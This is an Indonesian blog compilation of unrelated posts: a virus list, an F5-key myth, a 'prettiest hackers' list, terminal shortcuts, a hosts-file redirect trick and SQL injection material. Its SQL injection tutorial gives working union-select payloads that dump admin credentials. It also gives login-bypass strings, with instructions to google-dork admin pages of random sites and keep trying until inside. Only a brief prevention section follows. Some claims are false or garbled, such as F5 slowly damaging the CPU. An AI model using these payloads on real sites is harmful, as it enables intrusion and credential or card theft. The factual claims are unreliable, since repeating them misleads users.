Inilah TOP 10 Virus Terkejam di Dunia

 
1.Storm Worm

Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters
Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots.
Atau biasa digunakan hacker untuk spam mail melalui internet.

2. Leap-A/Oompa- A

Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem
tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac.
Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu.
Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan
bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.

3. Sasser and Netsky

Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga
nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer
tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan
jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1
taon 9 bulan, karena umurnya masih di bawah 18 taon.

4. MyDome (Novarg)

Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS.
Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.

5.SQL Slammer/Saphire

Muncul Januari 2003, nyebar cepet lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash,
ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapap penerbangan karena eror
check in ama tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.

6.Nimda

Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO
Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet,
menyebar lewat Internet. Nimda akan ngebuat backdoor ke OS. jadi penyerang bisa akses ke server dan
berbuat apa saja Nimda juga menjadi DDoS.

7.Code Red & Code Red II

Muncul musim panas 2001, nyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi ngabisin memori. Paling seru waktu berhubungan ama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.

8.The Klez

Nongol taon 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer ga bisa beroperasi, bisa berhentiin program antivirus.

9.ILOVEYOU

Abis “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.

10.Melissa

Dibikin taon 1999 sama David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis ngirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan

Bahaya Menggunakan Tombol F5 Terlalu Sering

Bahaya Memencet Tombol F5 Terlalu Sering

Bahaya Memencet Tombol F5 Terlalu Sering - Mungkin kebanyakan orang pernah atau bahkan sering merefresh komputer mereka dengan menggunakan tombol F5 pada keyboard. Merefresh komputer berguna untuk mempercepat kinerja komputer. Namun ternyata menggunakan tombol F5 terlalu sering dapat membawa dampak negatif bagi komputer anda. Apa dampaknya?

Mengapa seseorang perlu melakukan refresh?
Ada beragam alasan mengapa seseorang perlu merefresh komputer, diantaranya :
1. Komputer dirasa agak lemot, jadi harus direfresh
2. Terlalu banyak icon shortcut berserakan di desktop
3. Icon di desktop yang tidak muncul/hank karena cache tidak merespon
4. Ukuran wallpaper yang melebihi kapasitas display

Bahaya menggunakan tombol F5 terlalu sering
Lantas apa resiko dari seringnya menggunakan tombol F5 bagi komputer? Menggunakan tombol F5 terlalu sering dapat menyebabkan CPU komputer rusak secara perlahan.

Bagaimana cara membuktikannya?
1. Buka task manager :
- Bisa dengan mengklik kanan taskbar lalu pilih Start Task Manager
- Menggunakan shortkey ctrl+alt+del
2. Pilih tab perfomance
3. Perhatikan CPU Usage anda. CPU Usage normalnya berada dibawah 50%, apabila anda sering menggunakan tombol F5, CPU Usage bisa meningkat hingga 100%
Bahaya Menggunakan Tombol F5 Terlalu Sering
Sebelum Menekan Tombol F5

Bahaya Menggunakan Tombol F5 Terlalu Sering
Setelah Menekan Tombol F5

Oleh karena itu, saran saya yaitu janganlah terlalu sering memencet/menekan/menggunakan tombol F5, karena bisa berdampak negatif untuk komputer anda, khususnya bagian CPU.

Hacker / Cracker Paling Cantik di Dunia



Siapa sajakah mereka ? langsung pantengin aja dibawah ini :D
1. Adeanna Cooke
 Adeanna Cooke, Dia adalah seorang mantan model Playboy dan juga seorang hacker komputer. Meskipun majalah ini berisi foto-foto syur, tetapi dia meng-hack sebuah website yang menunjukkan kemolekan tubuhnya untuk mempertahankan harga dirinya sebagai kaum wanita. Salah satu temannya menggunakan gambar dia di internet untuk mendapatkan uang tanpa izin darinya lalu ia masuk ke website tersebut dan membersihkan semua foto tersebut. Dia juga membantu banyak gadis untuk keluar dari situasi yang sama dengan dirinya. 
2. Anna Chapman

Anna Chapman, dia seorang berwarganegara Rusia yang berada di New York City ketika ia ditangkap bersama sembilan orang lainnya pada tanggal 27 Juni 2010, karena dicurigai bekerja untuk Program jaringan mata-mata Narkotika di bawah badan intelijen eksternal Federasi Rusia. Setelah penangkapannya oleh FBI atas keterlibatannya dengan Program Narkotika, Chapman menjadi selebriti. Foto diambil dari profil Facebooknya muncul di web, dan beberapa video dirinya yang diunggah ke YouTube. Pada bulan Oktober 2010, Chapman berpose di sampul majalah Maxim versi Rusia. Majalah ini memasukan Chapman dalam daftar 100 wanita terseksi Rusia. Pada April 2011, Chapman sebagai model catwalk untuk pagelaran Moskow Fashion Week di Shiyan & Rudkovskaya. Pada bulan Juni 2012, Chapman menjadi model lagi untuk Antalya di Dosso Dossi. Pada 3 Juli 2013 Chapman menjadi perhatian media, karena melalui Twitternya, dia meminta Edward Snowden untuk menikahinya.


3. Kristina Svechinskaya











. Kristina Svechinskaya, dia adalah hacker Rusia yang membobol situs-situs keuangan dunia dengan cara mentransfer uang ke rekeningnya secara ilegal melalui jasa pengiriman, atau elektronik, atas nama orang lain. Seorang mahasiswa Universitas New York, dia salah satu nama yang paling umum di dunia hacker, dia dituduh menipu beberapa bank Inggris dan AS dalam jumlah yang cukup besar dan penggunaan paspor palsu. Menurut tuduhan, Svechinskaya menggunakan Zeus trojan horse untuk menyerang ribuan rekening bank dan membuka sedikitnya lima rekening di Bank of America dan Wachovia, yang menerima 35,000 USD dari pencurian uang. Diperkirakan hasil hacknya yang dibantu dengan sembilan orang lain, Svechinskaya telah menerima sebesar 3 juta USD secara keseluruhan.


4. Joanna Rutkowska


Joanna Rutkowska, dia adalah seorang peneliti keamanan komputer Polandia dan seorang hacker. Dia dikenal karena penelitiannya tentang tingkat keamanan rendah dan malware siluman. Dia menjadi terkenal setelah konferensi Black Hat Briefings di Las Vegas pada bulan Agustus 2006, di mana Rutkowska mempresentasikan serangan terhadap mekanisme perlindungan kernel Vista, yang dikenal dengan julukan teknik Blue Pill, yang menggunakan virtualisasi hardware untuk memindahkan OS ke mesin virtual. Selanjutnya ia telah dinobatkan sebagai salah satu dari Lima Hacker oleh Majalah eWeek pada tahun 2006. Rutkowska juga memberikan saran terbuka untuk Vice President Unit Teknologi Keamanan Microsoft untuk lebih memperketat keamanan pada sistem Windows Vista. Dia merupakan hacker elit yang merupakan entrepruener yang meluncurkan layanan keamanan sendiri melalui startup Invisible Things Lab di Warsawa, Polandia.

5. Ying Cracker

Ying Cracker, dia adalah salah satu hacker paling cantik dan seorang pendidik dari Shanghai, Cina. Dia mengajarkan orang dasar-dasar bagaimana cara untuk memulai hacking, hal-hal seperti mengubah alamat IP atau menghapus password kantor. Dia terkenal ketika sebuah forum online "Chinese Hottie Hackers" dalam sebuah postingan Cracker mendapat perhatian dari gawker di internet dan menciptakan basis fans yang besar untuknya. Seseorang tidak dapat menyangkal fakta bahwa pekerjaannya sangat mengesankan. Dia seorang ahli dalam hacker yang menulis perangkat lunak dan mendapatkan uang dari kursus dengan menggunakan alat hacking sederhana, dan dia juga membantu crack software orang lain. Dia mengenakan biaya 500-5000 RMB untuk membantu orang yang ingin memecahkan perangkat lunak apapun. Itulah sebabnya mengapa ia mendapat nama belakang "Cracker". 
6. Xiau Tian

Xiau Tian, Teringat dengan kata hacker, biasanya yang terlintas di bayangan adalah seorang kutu buku dengan kaca mata tebal dengan gaya hidup yang acak-acakan. Tapi tidak berlaku untuk Xiao Tian. Dia adalah seorang hacker yang modis.Penampilan dan gaya hidupnya begitu rapi, dinamis bahkan terkesan feminim. ia juga tertarik sekali dengan dunia fashion, khususnya sepatu. Dalam blog nya dia sering berbagi cerita tentang tempat-tempat yang pernah dia datangi. Itulah alasan mengapa Xiao memiliki banyak fans dan followers di dunia, khususnya para pria.
Xiao Tian, mulai dikenal sejak umur 19 tahun. Setelah membentuk China Girl Security Team, salah satu kelompok hacker khusus wanita terbesar di china. Kiprahnya dalam dunia hacking juga tidak diragukan lagi. Raksasa search engine nomor satu di dunia, Google pun pernah merasakan serangan hebat dari Tian beserta timnya. Xiao Tian melakukan serangan canggih terhadap sistem infrastruktur google china.
Bahkan, google akhirnya tidak tahan dan memilih untuk menarik semua layanan operasionalnya di China akibat hantaman hacker yang bertubi-tubi tersebut.
Hihihi...... :D
Giaman Mas Bro.,?
Menarik kan Infonya, Ceweknya Cantik-cantik, awas jangan salah Fokus :v , ckckckckckck......
Semoga Manfaat ^_^...

Terminator Backtrack

Terminator Terminal we can found in:
Application--> Accesories--> Terminator

Terminator Help ; use command
 terminator -h

Now i will make run Mozzila from terminal
terminator -x firefox

we can split the terminal use command:
Ctrl+Shift+E (arrow right and arrow left)
 and here we can move dragbar in the left and righ use arrow key

Terminal Horizontall use command :
Ctrl+Shift+O

Use the new spesifik name on the terminal command:
terminator -T

terminator -m = for maximised window.
terminator -f = for full screen
terminator -b = instruct the window manager not render borderon the terminator window.
Ctrl + Shift + S = hide the scroolbar and show again.
Ctrl + Shift + F = Searching words on the terminal.

DNS Host URL File Hacking

Selamat Sore Menjelang Siang PCT Family !Ini adalah tulisan pertama saya di BinusHacker, semoga bermanfaat untuk kita semua.
Pernah kebayang gak saat kita mau buka website A tiba2 yang muncul malah website B, tapi anehnya Url nya adalah alamat website A ? wah…pikiran kita pasti langsung ke virus atau spyware, belum tentu, bisa aja ada seseorang yang iseng <baca:hacker> telah menyusup ke system kita dan merubah file host untuk di arahkan ke Url yang dia kehendaki
Terus Gimana caranya ? cekicrot….
1. Buka cmd kamu dengan cara masuk menu run→cmd trus enter
2. Kalau udah masuk ketikkan
cd\windows\system32\drivers\etc
Seperti gambar di bawah ini :
Photobucket
3.  Cek dulu isi file hosts nya dengan perintah type hosts maka akan muncul seperti gambar dibawah ini
Photobucket
4. Muncul kan isi dari file hosts, terus gimana cara ngrubahnya ? gini caranya…ping dulu alamat yang mau dijadikan pengubah url target. Disini saya ambil contoh : www.kompas.co.id
Photobucket
5.  Nah, dapetkan IP nya.  tinggal nentuin sasarannya, website sasaran saya adalah www.jasaraharja.co.id, kalian boleh website apa aja.
6. jadi perintahnya adalah :
echo 202.146.4.100 www.jasaraharja.co.id >> hosts
trus enter deh.
Photobucket
7. Coba cek lagi di hosts nya tadi dengan perintah type hosts dah muncul kan perubahan
yang kita lakukan tadi…
Photobucket
8.  Buat nge-cek hasilnya,buka browser kamu dan coba browse ke www.jasaraharja.co.id
Pasti berubah tampilannya ke kompas.com, kaya ini nih..
Photobucket
Gak sulit kan membuat halaman website redirect ke halaman lain, hanya bermodalkan cmd aja.
Selamat Mencoba !  :)

Pengertian, Tutorial & Tools SQL Injection

Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.

SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:
1. BSQL Hacker

Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection yang di rancang untuk mengeksplor hampir seluruh jenis data base
[DOWNLOAD BSQL HACKER]

2. The Mole

Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS / IDS yang menggunakan filter generik, mole dapat meng eksplor hanya dengan menggunak URL yang rentan dan string valid.
[DOWNLOAD THE MOLE]

3. Pangolin

Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC, Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan user-friendly GUI dan support hampir untuk selur data base.
[DOWNLOAD PANGOLIN]

4. SQLMap
SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data base MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
[DOWNLOAD SQLMAP]

5. Havij

Tool ini sudah sangat terkenal di gunakan oleh para peretas di seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah 95 persen dan masih banyak lagi kelebihan havij.
[DOWNLOAD HAVIJ]

6. Enema SQLi

Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis, enema bukanlah tool otomatis, enam tool yang di namis yang memang di rancang untuk profesional.
[DOWNLOAD ENEMA SQLI]

7. SQL Ninja

Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk targen server SQL, data base fingerprint, dan semu kemampuan untuk mengendalikan database yang rentan injek.
[DOWNLOAD SQL NINJA]

8. SQL Sus
Sql Sus merupakan tool open source antar mukanya berbasis perintah, anda dapat mengambil data base, mendownload file dari data base server dan masih banya lagi.
[DOWNLOAD SQL Sus]

9. Safe SQL Injector

Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan eksploitasi kelemahan SQL injection dan pengambilalihan database server.
[DOWNLOAD SAFE SQL INJECTOR]

10. SQL Poizon

SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang telah terintegrasi di dalamnya.
[DOWNLOAD SQL POIZON]

Manual Tutorial SQL Injection

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
[ Langkah 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100′ atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Langkah 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya…
    gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
    [site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
    Misal:[site]/berita.php?id=-100+order+by+1–
    [site]/berita.php?id=-100+order+by+2–
    [site]/berita.php?id=-100+order+by+3–
    [site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
    Misal: [site]/berita.php?id=-100+order+by+9–Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8–
[ Langkah 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama yg keluar angka 5gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Langkah 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama table yang muncul adalah “admin”
[ Langkah 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()–
[ Langkah 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E–
[ Langkah 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah id,username,passwordContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
[ Langkah 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Source HN Forum
SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.

Contoh Sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” .
“where email = ‘$Email’ and password = ‘$Password’”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = “select id,name,email,password,type,block from user”.
“where email = ‘$Email’”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a’='a
Password : ` or `a’='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a’='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.
(Source: singgahpay.blogspot)
Semoga berbagai artikel tersebut bermanfaat, thanks to google and blogspot. :)